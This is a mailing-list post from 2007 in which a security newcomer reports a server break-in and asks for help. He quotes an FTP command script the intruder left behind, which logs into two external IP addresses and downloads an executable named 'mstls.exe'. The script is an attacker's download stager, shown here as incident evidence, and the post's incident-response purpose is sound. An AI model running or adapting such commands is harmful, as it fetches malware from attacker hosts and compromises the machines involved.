Home page logo
/

basics logo Security Basics mailing list archives

what next
From: nemanja.janic () centroproizvod co yu
Date: 6 Feb 2007 11:38:26 -0000

Hello list,
i wasn't sure where to post this, and since i'm just starting out in security, i figured that this is the place.
Here goes:
i've had a fine unknown gentleman enter at his will to my server; among other things he left behind a file named tt (no 
extension) which contained the following lines:

open 80.93.223.22 14547 
user 1 1  
get mstls.exe  
quit  
open 80.71.219.134 5191 
user 1 1  
get mstls.exe  
quit

I figure this is some script to be used with ftp, or at least i think so. 
I did tracert to those adresses, but that's where i'm stuck. What can i do next? 
And any idea what that mstls.exe is? I deleted it, but it was 0 bytes in size. 
Thanx in advance.


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]